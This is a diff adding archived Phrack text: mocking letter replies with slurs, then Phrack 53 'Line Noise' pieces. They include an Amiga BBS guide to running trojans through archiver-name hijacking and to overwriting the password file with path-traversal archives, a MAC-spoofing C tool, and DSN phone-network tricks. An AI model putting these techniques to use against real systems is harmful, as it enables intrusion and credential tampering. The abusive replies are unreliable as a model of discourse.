+    [ I have a thought.  Get a speak n' spell. ]
+
+     I can't belive I am sending this from hotmail bought out by
+microshit blah blah no this thing must be really insecure.
+
+    [ Well, maybe it just needs love and attention and for someone to say nice
+      things to it. ]
+
+     Well I have a whole line of ideas and no one ever listens to me
+netscape ect... but if your intrested e-mail me back and I'll give you
+my POP adress. The benifit of this system is 1) we can piss off the FBI
+
+    [ Yes, let's piss off the F.B.I.  And, while we're at it, let's piss off
+      the IRS and let's annoy the CIA..  We can poke fun at the retarded
+      wrestlers association.  And lastly, let's aggravate an enraged bull. ]
+
+and 2) final we hackers can have a place to loyter and idile , lurk at
+
+    [ loyter and idile?  Hey, aren't they those two Jewish film critics?  I
+      love them! ]
+
+where we can say what ever the Hell such as Full deatails on how to
+enter a sys,ect...of corse we will have to screen ppl for trust ect...
+
+    [ And screen them for stupidity. ]
+
+But I reall belive we can werk this.
+If you want to here the rest of my ground shaking ideas just ask, or
+full deatials on the Crypto.net .
+
+    [ Pass. ]
+
+0x19>-------------------------------------------------------------------------
+
+First off, I'd like to say that I love the mag...but you really get some
+nutjobs that post to it..(myself included) I'm not an elite hacker, a unix
+guru or anything like that(duh), but I am amazed at the effort you put into
+Phrack...anyways, keep up the good work
+
+    [ Thanks, nutjob. ]
+
+0x1a>-------------------------------------------------------------------------
+
+Hello,
+
+Who was the first hacker in history?
+
+    [ God. ]
+
+thanks for your time,
+greetings,
+Max
+
+0x1b>-------------------------------------------------------------------------
+
+Hi.
+
+i'm a Swedish kid and i just wonders
+
+    [ Now the Swedes I like.  Beautiful women.  Amazing accents.  I *think*
+      they like me.  Although this one particularly hot Swedish girl I know
+      doesn't seem to like me much.  I think maybe it's because I try too hard
+      around her.  She'll come around and I'll be like bouncing off the walls
+      trying to impress her..  I remember one time I got so excited I almost
+      set sail for gaiety.  I know.  I know.  I should "just relax" and
+      everything will fall into place.  I dunno tho.  She's so pretty.  And
+      ahm just so awkward... ]
+
+if you might know a good haking, freaking and craking
+site. I've checked everywhere but i have not any.
+
+    [ Huh? ]
+
+0x1c>-------------------------------------------------------------------------
+
+Hey sup, I'm makin an essay site similar to Slackers Inc. but with more
+essays. The only problem is I need sponsors to get my page up, can you pay me
+a small fee monthly for displayin a banner for your site. I know almost
+
+    [ O.k.  Sure, how does nothing/month sound? ]
+
+everybody knows about Phrack Magazine but I heard you do some sponsoring, E-
+mail me back if you are interested.
+
+    [ Yah, we are *so* reknown for our advertising budget.  And now I'd like to
+      make Phrack reknown for sponsoring a gay fucking highschool/college paper
+      stealing webpage.  Sure.  I'll get right on that after we do our 'kick
+      a baby harp seal campaign'. ]
+
+0x1d>-------------------------------------------------------------------------
+
+     You need to write an Interactive tutorial to simulate hacking into a
+private college or a company. You should make it realistic and hard to access.
+
+    [ Someone already did.  They're called *.edu and *.com.  Although sometimes
+      they're not too realistic. ]
+
+0x1e>-------------------------------------------------------------------------
+
+[ P52-14: International Crime Syndicate Association ]
+
+Dorathea Demming,
+
+You remark that the ICSA doesn't guarantee their certification against
+attack.
+
+"In plain English, they are saying that if you get sued, you are on your
+own."
+
+Do you know of any security company, consultant, or consortia that will
+commit to helping a customer legally if they've been attacked?
+
+Stu
+
+0x1f>-------------------------------------------------------------------------
+
+In skateboarding you are a "poseur" if you don't know shit.
+In the computers culture you are a "lamer" if you don't know shit.
+
+The term that bugs me is "elite" or "eleet" or "3l33t3".
+Are you elite?
+
+I just don't like the term.
+I really like the term "HI-FI" ,as in high-fidelity, or high-fidelity
+stereo's.
+
+An outdate term that orginally meant "I've got the best gear".
+But now it just means "late 70's marketing scheme".
+
+Are you hi-fi?
+It has a ring to it.
+You may be elite right now but in time you'll be hi-fi.
+
+------------------------------------------------------------------------------
+
+----[  EOF
diff --git a/phrack53/3.txt b/phrack53/3.txt
new file mode 100644
index 0000000..9011866
--- /dev/null
+++ b/phrack53/3.txt
@@ -0,0 +1,1123 @@
+---[  Phrack Magazine   Volume 8, Issue 53 July 8, 1998, article 03 of 15
+
+
+-------------------------[  P H R A C K     5 3     L I N E N O I S E
+
+
+--------[  Various
+
+
+0x1>-------------------------------------------------------------------------
+
+            On not being a moron in public
+                - nihilis
+
+            (In response to why cantor kick-banned someone off of #Phrack
+	      without warning:
+
+              <cantor:#phrack> you were an idiot near me
+              <cantor:#phrack> i hate that)
+
+I wouldn't think normally that this is an article which needs to be written. 
+But as experience has shown, it may very well be.
+
+Several months ago I was on the IRC EFnet's channel #phrack and one of the
+users spouted a URL for a web page he and his cohorts had hacked.  On it he
+had kindly sent salutations to everyone he knew and to Phrack.  We, the
+other occupants of the channel all admitted that none of us spoke
+authoritatively in the magazine's behalf, but that we were confident that
+none of the editorial staff would appreciate being implicated in a felony by
+association.  The user didn't seem to understand.
+
+The next day, when the user was asked to join some of the authorities at the
+local station-house for a short interview, I'm sure he wet his pants.  The
+line of questioning was short:  it merely established that he had not been the
+culprit in further attacks on the same host.  The police released him uncharged.
+
+In discussions with him later on #Phrack, we weren't surprised to find that he
+had been apprehended.  As things played out, the user clearly felt no crime had
+been committed:  All he did was change a web page.  He adamantly protested
+that he didn't do any damage, he didn't put in any backdoors, he didn't know
+that root's .rhosts contained four simple bytes:  "+ +\n".
+
+Clearly this user didn't look very hard in what were apparently his several
+weeks of attempting to hack the site.
+ 
+Interestingly enough, I haven't seen this user on IRC since about a week after
+the episode.
+
+There are several morals to this story:  Hacking is a felony.  Any
+unauthorized access constitutes hacking.  If you do hack something, don't be a
+moron about it.
+
+It's likely always been this way, but it's only been more recently I've been
+paying attention, I suspect: The advent of information availability and a
+rise in the number people for whom the net has always been "the norm" is
+producing a class of users who cannot think for themselves.  As reliance
+upon scripted attacks increases, the number of people who personally possess
+technical knowledge decreases.
+
+Today I was lurking and watching the activity on #Phrack while tending to
+issues at work.  The two largest discussions which come to mind are that SYN
+flooding cannot be prevented, even using the newest Linux kernel; and what
+0x0D means and that, yes, it is interchangeable for 13 in a C program.  For
+the latter, the opposing point of view was presented by "an experienced C
+programmer."
+
+This was actually a civil conversation.  People in-the-know were actually a
+little more crude than necessary, and the groups in need of reeducation
+admitted faults without needing four reference sources and three IETF
+standards quoted.  It was a good day.
+
+People these days seem generally unwilling to concede that someone else on the
+Internet has done their homework, has studied the standards, and has an
+advantage.  They consider themselves experienced because they got an
+unpatched Windows NT to bring up the Blue Screen Of Death remotely using a
+program published four months ago.  They hack web pages and put their names
+on it.
+
+They seem unwilling to read the code given to them to establish exactly what
+happens when the newest 0-day exploit runs.  They do not find the holes.  They
+seem generally more interested in fucking someone over (unaware of potential
+consequences) than in really solving any sort of technical problem.  It's all
+a race, it's all a game, it's all a matter of who has the newest tools.
+
+I'm writing this now because I'm sick of that.  I'm sick of people who think
+they're smart and are intent on making sure I know it by putting their feet
+in their mouths.  I'm sick of people who persistently ignore advice given to
+them and get angry when the consequences happen.  I'm sick of people who
+cannot contribute intelligently to a conversation.
+
+So here are some tips for the future:
+
+You're a lot more impressive if you say something right than if you say
+something wrong.  Someone nearby may be able to verify your claim and may
+call you on it.
+
+You're a lot more impressive if you can do something effortlessly because
+you've done it before than if you bumble and stumble through an experience
+because you thought you could do it and were wrong.
+
+If you're caught in a lie, admit it.  The people who caught you already know
+more than you do:  If you continue to spout bullshit, they'll know that too. 
+But do your homework.  Don't let them catch you being an idiot twice.
+
+If you do something illegal, don't broadcast it.  This is especially stupid. 
+Chances are, someone will be looking for someone to blame soon.  By
+announcing that you're responsible, you're inviting them to contact you.
+
+0x2>-------------------------------------------------------------------------
+
+                          Portable BBS Hacking
+                    Extra tips for Amiga BBS systems
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+    After reading Khelbin's article from Phrack 50 (article 03), it reminded
+me of the similar tricks I had learnt for Amiga BBS systems.  So I decided to
+write a small article covering the Amiga specific things.
+
+    As with Khelbin's article, the actual BBS software isn't particularly
+important since they mostly all work the same way in the respect of archivers.
+This trick can also be used on other users, but I'll cover that later in the
+article.
+
+    Firstly, the Amiga supports patching.  This means you can set up paths
+which point to the directories where your commands are held.  The Amiga OS
+also automatically sets a path to the current directory.  As far as I know,
+you can't stop it doing this, but you don't need to anyway, if you're smart.
+This firstly problem, relating to the patching of the current directory is more
+common than you might expect, since it's such a simple thing to overlook.
+
+    What happens is this: The BBS receives a new file from you, and unarchives
+it to a temporary dir for whatever reason.  It virus checks the files (or
+whatever) then it attempt to recompress the files.  But, if your file
+contained an executable named the same as the BBS's archiver, it would call
+the one you uploaded, since the BBS would've CDed to the temp dir to
+rearchive the files.  As you can imagine, you can use this to activate all
+sorts of trojans and viruses, as long as the virus checker doesn't
+recognize them.  A good idea is to make sure your trojan calls the proper
+command as well, so the sysop doesn't notice immediately.  The more
+observant sysops will have circumvented this problem by calling the archive
+with an absolute path, and/or using another method to rearchive the files,
+without having to CD into the temp dir.
+
+    The second trick is very similar to Khelbin's method of hex-editing
+archives.  The only difference is, on the Amiga, the backslash and slash are
+swapped.  For example, you create a file containing a new password file for
+the BBS in question.
+
+    > makedir temp/BBSData
+    > copy MyBBSPasswords.dat temp/BBSData/userdata
+    > lha -r a SomeFiles.lha temp
+
+    For the makedir, make the "temp" dir name to be however long it needs to be
+when you overwrite the characters of it in the hex-editor. In this case, we
+need 4.
+
+    Now, load the archive into a hex editor like FileMaster and find the
+string:
+
+    "temp\BBSData\userdata"
+
+and change it to whatever you need, for example:
+
+    "\\\\BBSData\userdata"
+
+which will unarchive 4 levels back from his temporary directory into the real
+BBSData dir.  The only problem with this is that you need to know a little
+about the BBS's directory structure.  But, if you intend to hack it, you
+should probably know that much anyway.
+
+    You'll notice that within the archive, the slash and backslash are swapped.
+This is important to remember, since using the wrong one will mean your
+archive will fail to extract correctly.  The article about this from Phrack
+50 was for PCs, which use backslash for directory operations.  The Amiga
+uses slash instead, but apart from that, the methods used in that article
+will work fine for Amiga archives.
+
+    If you know the Sysop of the BBS has a program like UnixDirs installed, you
+can even use the ".." to get to the root dir.  The only other way to do that
+is to use a ":", however, I am not sure if this works.  I have a feeling LhA
+would barf.  Luckily, since the Amiga isn't limited by 8.3 filename problems,
+you can traverse directories much easier than with the limit imposed on PC
+systems.
+
+    The only real way the Sysop can fix this problem is by have his temp dir
+for unarchiving to be a device which has nothing important on it, like RAM:.
+That way, if the archive is extracted to RAM: and tries to step back 3
+directories using "///", it'll still be in RAM: and won't screw with anything
+important.
+
+0x3>-------------------------------------------------------------------------
+
+<++> EX/changemac.c
+/*
+ *  In P51-02 someone mentioned Ethernet spoofing.  Here you go.
+ *  This tiny program can be used to trick some smart / switching hubs.
+ *             
+ *  AWL production: (General Public License v2)
+ *
+ *      changemac  version 1.0  (2.20.1998)
+ *
+ *  changemac  --   change MAC address of your ethernet card.
+ *
+ *  changemac [-l] | [-d number ] [ -r | -a address ]
+ *
+ *      -d number       number of ethernet device, 0 for eth0, 1 for eth1 ...
+ *                      if -d option is not specify default value is 0 (eth0)
+ *
+ *      -h              help for changemac command
+ *
+ *      -a address      address format is xx:xx:xx:xx:xx:xx
+ *
+ *      -r              set random MAC address for ethernet card
+ *
+ *      -l              list first three MAC bytes of known ethernet vendors
+ *                      (this list is not compleet, anyone who know some more
+ *                      information about MAC addresses can mail me)
+ *
+ *  changemac does not change hardware address, it just change data in
+ *  structure of kernel driver for your card.  Next boot on your computer will
+ *  read real MAC form your hardware.
+ *
+ *  The changed MAC stays as long as your box is running, (or as long as next
+ *  successful changemac).
+ *
+ *  It will not work if kernel is already using that ethernet device.  In that
+ *  case you have to turn off that device (ifconfig eth0 down).
+ *
+ *  I use changemac in /etc/rc.d/rc.inet1 (slackware, or redhat) just line
+ *  before ifconfig for ethernet device (/sbin/ifconfig eth0 ...)
+ *
+ *  The author will be very pleased if you can learn something form this code.
+ *
+ *  Updates of this code can be found on:
+ *  http://galeb.etf.bg.ac.yu/~azdaja/changemac.html
+ *
+ *  Sugestions and comments can be sent to author:
+ *  Milos Prodanovic <azdaja@galeb.etf.bg.ac.yu>
+ */
+
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <errno.h>
+#include <sys/socket.h>
+#include <sys/ioctl.h>
+#include <net/if.h>
+#include <unistd.h>
+
+
+struct LIST
+{
+    char name[50];
+    u_char mac[3];
+};
+
+/*
+ *  This list was obtainted from vyncke@csl.sni.be, created on 01.7.93.
+ */
+
+struct LIST vendors[] = {
+                {"OS/9 Network                         ",'\x00','\x00','\x00'},
+                {"BBN                                  ",'\x00','\x00','\x02'},
+                {"Cisco                                ",'\x00','\x00','\x0C'},
+                {"Fujitsu                              ",'\x00','\x00','\x0E'},
+                {"NeXT                                 ",'\x00','\x00','\x0F'},
+                {"Sytek/Hughes LAN Systems             ",'\x00','\x00','\x10'},
+                {"Tektronics                           ",'\x00','\x00','\x11'},
+                {"Datapoint                            ",'\x00','\x00','\x15'},
+                {"Webster                              ",'\x00','\x00','\x18'},
+                {"AMD ?                                ",'\x00','\x00','\x1A'},
+                {"Novell/Eagle Technology              ",'\x00','\x00','\x1B'},
+                {"Cabletron                            ",'\x00','\x00','\x1D'},
+                {"Data Industrier AB                   ",'\x00','\x00','\x20'},
+                {"SC&C                                 ",'\x00','\x00','\x21'},
+                {"Visual Technology                    ",'\x00','\x00','\x22'},
+                {"ABB                                  ",'\x00','\x00','\x23'},
+                {"IMC                                  ",'\x00','\x00','\x29'},
+                {"TRW                                  ",'\x00','\x00','\x2A'},
+                {"Auspex                               ",'\x00','\x00','\x3C'},
+                {"ATT                                  ",'\x00','\x00','\x3D'},
+                {"Castelle                             ",'\x00','\x00','\x44'},
+                {"Bunker Ramo                          ",'\x00','\x00','\x46'},
+                {"Apricot                              ",'\x00','\x00','\x49'},
+                {"APT                                  ",'\x00','\x00','\x4B'},
+                {"Logicraft                            ",'\x00','\x00','\x4F'},
+                {"Hob Electronic                       ",'\x00','\x00','\x51'},
+                {"ODS                                  ",'\x00','\x00','\x52'},
+                {"AT&T                                 ",'\x00','\x00','\x55'},
+                {"SK/Xerox                             ",'\x00','\x00','\x5A'},
+                {"RCE                                  ",'\x00','\x00','\x5D'},
+                {"IANA                                 ",'\x00','\x00','\x5E'},
+                {"Gateway                              ",'\x00','\x00','\x61'},
+                {"Honeywell                            ",'\x00','\x00','\x62'},
+                {"Network General                      ",'\x00','\x00','\x65'},
+                {"Silicon Graphics                     ",'\x00','\x00','\x69'},
+                {"MIPS                                 ",'\x00','\x00','\x6B'},
+                {"Madge                                ",'\x00','\x00','\x6F'},
+                {"Artisoft                             ",'\x00','\x00','\x6E'},
+                {"MIPS/Interphase                      ",'\x00','\x00','\x77'},
+                {"Labtam                               ",'\x00','\x00','\x78'},
+                {"Ardent                               ",'\x00','\x00','\x7A'},
+                {"Research Machines                    ",'\x00','\x00','\x7B'},
+                {"Cray Research/Harris                 ",'\x00','\x00','\x7D'},
+                {"Linotronic                           ",'\x00','\x00','\x7F'},
+                {"Dowty Network Services               ",'\x00','\x00','\x80'},
+                {"Synoptics                            ",'\x00','\x00','\x81'},
+                {"Aquila                               ",'\x00','\x00','\x84'},
+                {"Gateway                              ",'\x00','\x00','\x86'},
+                {"Cayman Systems                       ",'\x00','\x00','\x89'},
+                {"Datahouse Information Systems        ",'\x00','\x00','\x8A'},
+                {"Jupiter ? Solbourne                  ",'\x00','\x00','\x8E'},
+                {"Proteon                              ",'\x00','\x00','\x93'},
+                {"Asante                               ",'\x00','\x00','\x94'},
+                {"Sony/Tektronics                      ",'\x00','\x00','\x95'},
+                {"Epoch                                ",'\x00','\x00','\x97'},
+                {"CrossCom                             ",'\x00','\x00','\x98'},
+                {"Ameristar Technology                 ",'\x00','\x00','\x9F'},
+                {"Sanyo Electronics                    ",'\x00','\x00','\xA0'},
+                {"Wellfleet                            ",'\x00','\x00','\xA2'},
+                {"NAT                                  ",'\x00','\x00','\xA3'},
+                {"Acorn                                ",'\x00','\x00','\xA4'},
+                {"Compatible Systems Corporation       ",'\x00','\x00','\xA5'},
+                {"Network General                      ",'\x00','\x00','\xA6'},
+                {"NCD                                  ",'\x00','\x00','\xA7'},
+                {"Stratus                              ",'\x00','\x00','\xA8'},
+                {"Network Systems                      ",'\x00','\x00','\xA9'},
+                {"Xerox                                ",'\x00','\x00','\xAA'},
+                {"Western Digital/SMC                  ",'\x00','\x00','\xC0'},
+                {"Eon Systems (HP)                     ",'\x00','\x00','\xC6'},
+                {"Altos                                ",'\x00','\x00','\xC8'},
+                {"Emulex                               ",'\x00','\x00','\xC9'},
+                {"Darthmouth College                   ",'\x00','\x00','\xD7'},
+                {"3Com ? Novell ? [PS/2]               ",'\x00','\x00','\xD8'},
+                {"Gould                                ",'\x00','\x00','\xDD'},
+                {"Unigraph                             ",'\x00','\x00','\xDE'},
+                {"Acer Counterpoint                    ",'\x00','\x00','\xE2'},
+                {"Atlantec                             ",'\x00','\x00','\xEF'},
+                {"High Level Hardware (Orion, UK)      ",'\x00','\x00','\xFD'},
+                {"BBN                                  ",'\x00','\x01','\x02'},
+                {"Kabel                                ",'\x00','\x17','\x00'},
+                {"Xylogics, Inc.-Annex terminal servers",'\x00','\x08','\x2D'},
+                {"Frontier Software Development        ",'\x00','\x08','\x8C'},
+                {"Intel                                ",'\x00','\xAA','\x00'},
+                {"Ungermann-Bass                       ",'\x00','\xDD','\x00'},
+                {"Ungermann-Bass                       ",'\x00','\xDD','\x01'},
+                {"MICOM/Interlan [Unibus, Qbus, Apollo]",'\x02','\x07','\x01'},
+                {"Satelcom MegaPac                     ",'\x02','\x60','\x86'},
+                {"3Com [IBM PC, Imagen, Valid, Cisco]  ",'\x02','\x60','\x8C'},
+                {"CMC [Masscomp, SGI, Prime EXL]       ",'\x02','\xCF','\x1F'},
+                {"3Com (ex Bridge)                     ",'\x08','\x00','\x02'},
+                {"Symbolics                            ",'\x08','\x00','\x05'},
+                {"Siemens Nixdorf                      ",'\x08','\x00','\x06'},
+                {"Apple                                ",'\x08','\x00','\x07'},
+                {"HP                                   ",'\x08','\x00','\x09'},
+                {"Nestar Systems                       ",'\x08','\x00','\x0A'},
+                {"Unisys                               ",'\x08','\x00','\x0B'},
+                {"AT&T                                 ",'\x08','\x00','\x10'},
+                {"Tektronics                           ",'\x08','\x00','\x11'},
+                {"Excelan                              ",'\x08','\x00','\x14'},
+                {"NSC                                  ",'\x08','\x00','\x17'},
+                {"Data General                         ",'\x08','\x00','\x1A'},
+                {"Data General                         ",'\x08','\x00','\x1B'},
+                {"Apollo                               ",'\x08','\x00','\x1E'},
+                {"Sun                                  ",'\x08','\x00','\x20'},
+                {"Norsk Data                           ",'\x08','\x00','\x26'},
+                {"DEC                                  ",'\x08','\x00','\x2B'},
+                {"Bull                                 ",'\x08','\x00','\x38'},
+                {"Spider                               ",'\x08','\x00','\x39'},
+                {"Sony                                 ",'\x08','\x00','\x46'},
+                {"BICC                                 ",'\x08','\x00','\x4E'},
+                {"IBM                                  ",'\x08','\x00','\x5A'},
+                {"Silicon Graphics                     ",'\x08','\x00','\x69'},
+                {"Excelan                              ",'\x08','\x00','\x6E'},
+                {"Vitalink                             ",'\x08','\x00','\x7C'},
+                {"XIOS                                 ",'\x08','\x00','\x80'},
+                {"Imagen                               ",'\x80','\x00','\x86'}, 
+                {"Xyplex                               ",'\x80','\x00','\x87'},
+                {"Kinetics                             ",'\x80','\x00','\x89'},
+                {"Pyramid                              ",'\x80','\x00','\x8B'},
+                {"Retix                                ",'\x80','\x00','\x90'},
+                {'\x0','\x0','\x0','\x0'}
+                     };
+
+void change_MAC(u_char *,int);
+void list();
+void random_mac(u_char *);
+void help();
+void addr_scan(char *,u_char *);
+
+int
+main(int argc, char ** argv)
+{
+    char c;
+    u_char mac[6] = "\0\0\0\0\0\0";
+    int nr = 0,eth_num = 0,nr2 = 0;
+    extern char *optarg;
+
+    if (argc == 1)
+    {
+        printf("for help: changemac -h\n");
+        exit(1);
+    }
+
+    while ((c = getopt(argc, argv, "-la:rd:")) != EOF)
+    {
+        switch(c)
+        {
+            case 'l' :
+                list();
+                exit(1);
+            case 'r' :
+                nr++;
+                random_mac(mac);
+                break;
+            case 'a' :
+                nr++;
+                addr_scan(optarg,mac);
+                break;
+            case 'd' :
+                nr2++;
+                eth_num = atoi(optarg);
+                break;
+            default:
+                help();
+                exit(1);
+        }
+        if (nr2 > 1 || nr > 1)
+        {
+            printf("too many options\n");
+            exit(1);
+        }
+    }
+    change_MAC(mac,eth_num);
+    return (0);
+}
+
+void
+change_MAC(u_char *p, int ether)
+{
+    struct  ifreq  devea;
+    int s, i;
+
+    s = socket(AF_INET, SOCK_DGRAM, 0);
+    if (s < 0)
+    {
+        perror("socket");
+        exit(1);
+    }
+
+    sprintf(devea.ifr_name, "eth%d", ether);
+    if (ioctl(s, SIOCGIFHWADDR, &devea) < 0)
+    {
+        perror(devea.ifr_name);
+        exit(1);
+    }
+
+    printf("Current MAC is\t");
+    for (i = 0; i < 6; i++)
+    {
+        printf("%2.2x ", i[devea.ifr_hwaddr.sa_data] & 0xff);
+    }
+    printf("\n");
+
+/* an ANSI C  ?? --> just testing your compiler */
+    for(i = 0; i < 6; i++) i[devea.ifr_hwaddr.sa_data] = i[p];
+
+    printf("Changing MAC to\t");
+
+/* right here i am showing how interesting is programing in C */
+
+    printf("%2.2x:%2.2x:%2.2x:%2.2x:%2.2x:%2.2x\n", 
+        0[p],
+        1[p],
+        2[p],
+        3[p],
+        4[p],
+        5[p]);
+
+
+    if (ioctl(s,SIOCSIFHWADDR,&devea) < 0)
+    {
+        printf("Unable to change MAC -- Is eth%d device is up?\n", ether);
+        perror(devea.ifr_name);
+        exit(1);
+    }
+    printf("MAC changed\n");
+
+    /* just to be sure ... */
+
+    if (ioctl(s, SIOCGIFHWADDR, &devea) < 0)
+    {
+        perror(devea.ifr_name);
+        exit(1);
+    }
+
+    printf("Current MAC is: ");
+
+    for (i = 0; i < 6; i++) printf("%X ", i[devea.ifr_hwaddr.sa_data] & 0xff);
+    printf("\n");
+
+    close(s);
+}
+
+void
+list()
+{
+    int i = 0;
+    struct LIST *ptr;
+
+    printf("\nNumber\t MAC addr \t vendor\n");
+    while (0[i[vendors].name])
+    {
+        ptr = vendors + i;
+        printf("%d\t=> %2.2x:%2.2x:%2.2x \t%s \n",
+            i++,
+            0[ptr->mac],
+            1[ptr->mac],
+            2[ptr->mac],
+            ptr->name);
+        if (!(i % 15))
+        {
+            printf("\n press enter to continue\n");
+            getchar();
+        }
+    }
+}
+
+void
+random_mac(u_char *p)
+{
+    srandom(getpid());
+
+    0[p] = random() % 256;
+    1[p] = random() % 256;
+    2[p] = random() % 256;
+    3[p] = random() % 256;
+    4[p] = random() % 256;
+    5[p] = random() % 256;
+}
+
+void
+addr_scan(char *arg, u_char *mac)
+{
+    int i;
+
+    if (!(2[arg] == ':' && 
+            5[arg] == ':' &&
+            8[arg] == ':' &&
+            11[arg] == ':' &&
+            14[arg] == ':' &&
+            strlen(arg) == 17 ))
+    {
+        printf("address is not in spacified format\n");
+        exit(0);
+    }
+    for(i = 0; i < 6; i++) i[mac] = (char)(strtoul(arg + i*3, 0, 16) & 0xff);
+}
+
+void
+help()
+{
+    printf(" changemac - soft change MAC address of your ethernet card \n");
+    printf(" changemac -l | [-d number ] [ -r | -a address ] \n");
+    printf("   before you try to use it just turn ethernet card off, ifconfig ethX down\n");
+    printf(" -d number    number of ethernet device \n");
+    printf(" -h           this help \n");
+    printf(" -a address   address format is xx:xx:xx:xx:xx:xx \n");
+    printf(" -r           set random generated address \n");
+    printf(" -l           list first three MAC bytes of known ethernet vendors\n");
+    printf(" example: changemac -d 1 -a 12:34:56:78:9a:bc\n");
+}                                                           
+
+/* EOF */
+<-->
+
+0x4>-------------------------------------------------------------------------
+
+    The Defense Switched Network
+    By: DataStorm <havok@tfs.net>
+
+    This is an extremely shortened tutorial on the DSN.  More information
+is available through the DoD themselves and various places on the Internet.  If
+you have any comments or suggestions, feel free to e-mail me.
+
+
+***THE BASICS OF THE DSN***
+
+
+    Despite popular belief, the AUTOVON is gone, and a new DCS
+communication standard is in place, the DSN, or Defense Switched Network.
+
+    The DSN is used for the communication of data and voice between various
+DoD installations in six world theaters: Canada, the Caribbean, the
+Continental United States (CONUS), Europe, the Pacific and Alaska, and
+Southwest Asia.  The DSN is used for everything from video-teleconferencing,
+secure and insecure data and voice, and any other form of communication that
+can be transmitted over wiring.  It is made up of the old AUTOVON system, the
+European telephone system, the Japanese and Korean telephone upgrades, the
+Oahu system, the DCTN, the DRSN, the Video Teleconferencing Network, and more.
+
+    This makes the DSN incredibly large, which in turn makes it very useful.
+(See the section TRICKS in this article for more information.)
+
+    The DSN is extremely isolated.  It is designed to function even when
+outside communication lines have been destroyed and is not dependent on any
+outside equipment.  It uses its own switching equipment, lines, phones, and
+other components.  It has very little link to the outside world, since in a
+bombing/war, civilian telephone may be destroyed.  This aspect, of course,
+also means that all regulation of the DSN is done by the government itself.
+When you enter the DSN network, you are messing with the big boys.
+	
+    To place a call to someone in the DSN, you must first dial the DSN access
+number, which lets you into the network itself.  From there you can dial any
+number within the DSN, as long as it is not restricted from your calling area
+or hone. (Numbers both inside and outside the DSN can be restricted from calling
+certain numbers). 
+
+    If you are part of the DSN, you may periodically get a call from an
+operator, wanting to connect you with another person in or out of the network.
+To accept, you must tell her your name and local base telephone extension,
+your precedence, and any other information the operator feels she must have
+from you at that time. (I'm not sure of the operators abilities or
+technologies. They may have ANI in all or some areas.)
+
+    The DSN uses signaling techniques similar to Bell, with a few differences.
+The dial tone is the same on both networks; the network is open and ready.
+When you call or are being called, a DSN phone will ring just like a Bell
+phone, with one difference.  If the phone rings at a fairly normal rate, the
+call is of average precedence, or "Routine." If the ringing is fast, it is of
+higher precedence and importance.  A busy signal indicates that the line is
+either busy, or DSN equipment is busy.  Occasionally you may hear a tone
+called the "preempt" tone, which indicates that your call was booted off
+because one of higher precedence needed the line you were connected with.  If
+you pick up the phone and hear an odd fluctuating tone, this means that a
+conference call is being conducted and you are to be included.
+
+    As on many other large networks, the DSN uses different user classes to
+distinguish who is better than who, who gets precedence and more calls and who
+does not.  The most powerful user class is the "Special C2" user.  This
+fortunate military employee (or hacker?) has virtually unrestricted access to
+the system.  The Special C2 user identifies himself as that through a
+validation process.
+
+    The next class of user is the regular "C2" user.  To qualify, you must
+have the requirements for C2 communications, but do not have to meet the
+requirements for the Special C2 user advantages.  (These are users who
+coordinate military operations, forces, and important orders.)  The last type
+of user is insensitively called the "Other User."  This user has no need for
+Specail C2 or C2 communications, so he is not given them.  A good comparison
+would be "root" for Special C2, "bin" for C2, and "guest" for other.
+
+    The network is fairly secure and technologically advanced.  Secure voice
+is encrypted with the STU-III.  This is the third generation in a line of
+devices used to make encrypted voice, which is NOT considered data over the
+DSN.  Networking through the DSN is done with regular IP version 4, unless
+classified, in which case Secret IP Routing Network(SIPRNET) protocol is
+used.  Teleconferencing can be set up by the installation operator, and video
+teleconferencing is a common occurrence.
+
+    The DSN is better than the old AUTOVON system in speed and quality, which
+allows it to take more advantage of these technologies.  I'm sure that as we
+progress into faster transmission rates and higher technology, we will begin
+to see the DSN use more and more of what we see the good guys using on
+television.
+
+    Precedence on the DSN fits the standard NCS requirements, so I will not
+talk about it in great detail in this article.  All I think I have to clear up
+is that DSN phones do NOT use A, B, C, and D buttons as the phones in the
+AUTOVON did for precedence.  Precedence is done completely with standard DTMF
+for efficiency.
+
+    A DSN telephone directory is not distributed to the outside, mainly
+because of the cost and lack of interest.  However, I have listed the NPA's
+for the different theaters.  Notice that the DSN only covers major ally areas.
+You won't be able to connect to Russia with this system, sorry.  Keep in mind
+that each base has their own operator, who for the intra-DSN circuit, is
+reachable by dialing "0."  Here is a word of advice: there ARE people who sit
+around all day and monitor these lines.  Further, you can be assured these are
+specialized teams that work special projects at the echelons above reality.
+This means that if you do something dumb on the DSN from a location they can
+trace back to you, you WILL be imprisoned.
+
+AREA		DSN NPA
+
+Canada		312
+CONUS		312
+Caribbean	313
+Europe		314
+Pacific/Alaska	315/317
+S.W. Asia	318
+
+    The format for a DSN number is NPA-XXX-YYYY, where XXX is the installation
+prefix (each installation has at least one of their own) and YYYY is the
+unique number assigned to each internal pair, which eventually leads to a
+phone.  I'm not even going to bother with a list of numbers; there are just
+too many.  Check http://www.tfs.net/~havok (my home page) for the official DSN
+directory and more information.
+
+    DSN physical equipment is maintained and operated by a team of military
+specialists designed specifically for this task, (you won't see many Bell
+trucks around DSN areas).
+
+    Through even my deepest research, I was unable to find any technical
+specifications on the hardware of the actual switch, although I suppose they
+run a commercial brand such as ESS 5.  My resources were obscure in this area,
+to say the least.
+
+
+***TRICKS***
+
+    Just like any other system in existence, the DSN has security holes and
+toys we all can have fun with.  Here are a few. (If you find any more, drop me
+an e-mail.)
+
+    * Operators are located on different pairs in each base; one can never
+tell before dialing exactly who is behind the other line.  My best luck has
+been with XXX-0110 and XXX-0000.
+
+    * To get their number in the DSN directory, DoD installations write to:
+
+        HQ DISA, Code D322
+        11440 Isaac Newton Square
+        Reston, VA 20190-5006
+
+    * Another interesting address: It seems that
+
+        GTE Government Systems Corporation
+        Information Systems Division
+        15000 Conference Center Drive
+        Chantilly, VA 22021-3808
+
+    has quite a bit of involvement with the DSN and its documentation projects.
+
+
+***IN CONCLUSION***
+
+    As the DSN grows, so does my fascination with the system.  Watch for more
+articles about it.  I would like to say a BIG thanks to someone who wishes to
+remain unknown, a special english teacher, and the DoD for making their
+information easy to get a hold of.
+
+
+0x5>-------------------------------------------------------------------------
+
+Howdy,
+
+	I have found a weakness in the password implementations of
+FoolProof.  FoolProof is a software package used to secure workstations
+and LAN client machines from DoS and other lame-ass attacks by protecting
+system files (autoexec.bat, config.sys, system registry) and blocking
+access to specified commands and control panels.  FoolProof was written
+by Smart Stuff software originally for the Macintosh but recently
